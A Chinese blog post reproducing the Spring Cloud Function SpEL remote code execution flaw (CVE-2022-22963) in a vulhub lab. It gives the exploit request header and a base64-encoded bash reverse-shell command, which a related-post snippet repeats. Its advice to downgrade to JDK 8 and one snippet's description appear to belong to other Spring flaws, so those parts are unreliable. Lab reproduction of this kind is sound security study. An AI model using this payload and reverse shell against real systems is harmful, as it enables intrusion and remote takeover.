CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行 漏洞复现

已于 2022-09-25 14:41:55 修改
阅读量5.2k 收藏 22
点赞数 7
分类专栏: 漏洞复现【Free】 文章标签: 安全 web安全
于 2022-08-28 21:19:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44281295/article/details/126573730
版权

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

Docker环境:

漏洞环境:

0x06 漏洞复现

0x07 流量分析:

0x08 修复建议:

0x01 声明:

        仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

        SpringCloud 是一套分布式系统的解决方案,实现就是函数式编程,在视频转码、音视频转换、数据仓库ETL等与状态相关度低的领域运用的比较多。开发者无需关注服务器环境运维等问题上,专注于自身业务逻辑实现即可。

0x03 漏洞概述:

        在Spring Cloud Function版本3.1.6,3.2.2和更早的不受支持的版本中,当使用路由功能时,用户可以提供特制的SpEL作为路由表达式,这可能导致远程执行代码和访问本地资源。

0x04 影响版本:

        3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

0x05 环境搭建:

        Docker环境:

         参考这篇文章(Docker&Docker-compose环境安装_Evan Kang的博客-CSDN博客

        漏洞环境:

               1、下载vulhub(Vulhub环境压缩包-网络安全文档类资源-CSDN文库

       (GitHub - vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose

                2、进入vulhub/spring/CVE-2022-22963环境

                

                3、启动docker环境

                 4、访问系统(这是一个报错页面不用关系)

0x06 漏洞复现

        访问时用Burp拦截。

         利用POC:

                修改请求方式:

​POST /functionRouter HTTP/1.1

                添加请求体内容:

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xxxx")

xxxx:(为要执行的命令)

                如图:

                 上面执行的为反弹shell命令,经过base64加密之后的内容:(不加密无法成功的)

bash -c {echo,xxx}|{base64,-d}|{bash,-i}

                        ||(Base64)

bash -i >& /dev/tcp/192.168.16.129/1234 0>&1   

结果:

0x07 流量分析:

        请求特征:

0x08 修复建议:

        1、安装官方的补丁

        2、降级到 JDK 8 或更低版本,这将消除被攻击的可能性。

Evan Kang
关注
  • 7
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Spring Cloud Function SpEL 代码注入漏洞复现 (CVE-2022-22963)
yang1234567898的博客
04-25 3795
漏洞复现 启动vulhub靶场环境,出现下面的页面说明启动成功 首先,先用nc监听1234端口 需要将反弹shell的命令进行编码 bash -i >& /dev/tcp/192.168.96.1/1234 0>&1 编码脚本如下,直接复制改后缀名为.html打开即可 <!DOCTYPE html> <html> <head> <title>java runtime exe...
CVE-2022-22965:Spring远程代码执行漏洞复现
xjh8023的博客
11-09 447
CVE-2022-22965:Spring远程代码执行漏洞复现&getshell骚操作
Java代码审计之SpEL表达式注入漏洞分析_spel 代码审计
m0_63174618的博客
04-07 765
也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Linux运维知识点,真正体系化!**
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. 存在任何使用问题可以私信本人。
CVE-2022-22963 SpringCloud Function SpEL注入漏洞分析
阿道夫的博客
01-30 2239
在研究分析了CVE-2022-22980 Spring Data MongoDBSpEL表达式注入漏洞之后,想起之前在spring4shell爆出之前,存在于SpringCloudFunction中的一个SpEL表达式注入漏洞,编号为CVE-2022-22963。在这里对其进行一波分析和学习。
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
weixin_45715461的博客
07-10 2738
CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞 复现
CVE-2022-22963Spring Cloud Function SpEL 远程代码执行漏洞
m0_59092234的博客
09-02 867
SpringCloud Function作为SpringCloud家族成员最早在2017年提出,旨在为快速发展的Serverless市场提供一个Spring的接入路径,使用SpringCloud Function进行无服务(我这里直接称为函数式编程)的项目开发可以大大节约成本,同时对于SpringBoot熟悉的人可以迅速上手最近Spring Cloud Function组件爆出0day – SpEL表达式注入导致RCE,官方commit中的test已经公开对应细节。
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
然而,在 SpringCloud Function 中存在一个 SpEL 注入漏洞CVE-2022-22963),该漏洞可能会导致攻击者可以执行恶意代码,从而导致严重的安全问题。 SpELSpring Expression Language)是一种强大的表达式语言,...
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
CVE-2022-22947 SpringCloud GateWay SpEL RCE.doc
07-09
CVE-2022-22947是一种影响SpringCloud GateWay的远程代码执行漏洞,通过SpELSpring Expression Language)实现RCE(Remote Code Execution)。下面是关于该漏洞的详细分析和知识点总结。 一、漏洞概述 CVE-2022-...
『Java CVECVE-2022-22963: Spring Cloud Function SPEL表达式注入RCE
Ho1aAs‘s Blog
07-28 1440
## 漏洞简介 向`/functionRouter`路由发送headers带有`spring.cloud.function.routing-expression`键的POST包时,会触发SPEL解析该键值 ## 影响范围 3.0.0
Spring Cloud Function SpEL注入漏洞CVE-2022-22963)分析
AKAMAI_CHINA的博客
01-01 527
2022年3月24日,Pivotal修补了Spring Cloud Function中一个关键的服务器端代码注入漏洞Spring表达式语言注入),该漏洞有可能导致系统被攻击。
【vulhub系列】CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Wiofgb的博客
08-28 3018
记录一次CVE-2022-22963 Spring Cloud Function SpEL 远程代码执行漏洞复现
Spring Cloud Function SPEL表达式注入漏洞CVE-2022-22963
chaojixiaojingang
04-06 7593
1.漏洞描述 SpringCloudFunctionSpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 2.影响版本 Spring Cloud Function 3.0.0 <...
春秋云境:CVE-2022-22963
一只爱吃橙子的羊
01-20 833
SpringCloudFunctionSpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 题目链接为:http://ip:port P.S 卡慢不影响拿flag
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
最新发布
亚信安全官方账号的博客
07-19 556
一站式云安全托管限时试用 开启全能高效攻防
cve-2022-22963
09-19
CVE-2022-22963是一个针对某个软件或系统的安全漏洞的编号。根据我的了解,该漏洞可能会导致恶意用户利用该漏洞进行未经授权的访问、数据泄露、拒绝服务攻击等恶意活动。 具体而言,CVE-2022-22963可能是由于软件代码中的缺陷或错误导致的。黑客可以利用这些缺陷或错误,通过发送恶意请求或利用软件中的逻辑漏洞,来执行特定的攻击。这可能导致黑客窃取用户的敏感信息,破坏系统的完整性或可用性,甚至掌控受影响的软件或系统。 为了防止CVE-2022-22963的攻击,软件供应商通常会发布安全补丁或更新来修复漏洞。用户应该密切关注软件供应商的公告,尽快安装相关的安全补丁或更新。另外,网络管理员和用户还应该采取一些额外的安全措施,例如使用防火墙、强密码、定期备份数据等,以减少漏洞被利用的风险。 总之,CVE-2022-22963是一个安全漏洞的编号,通过及时安装补丁与采取适当的安全措施,可以最大程度地减少其对系统的风险和威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Evan Kang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值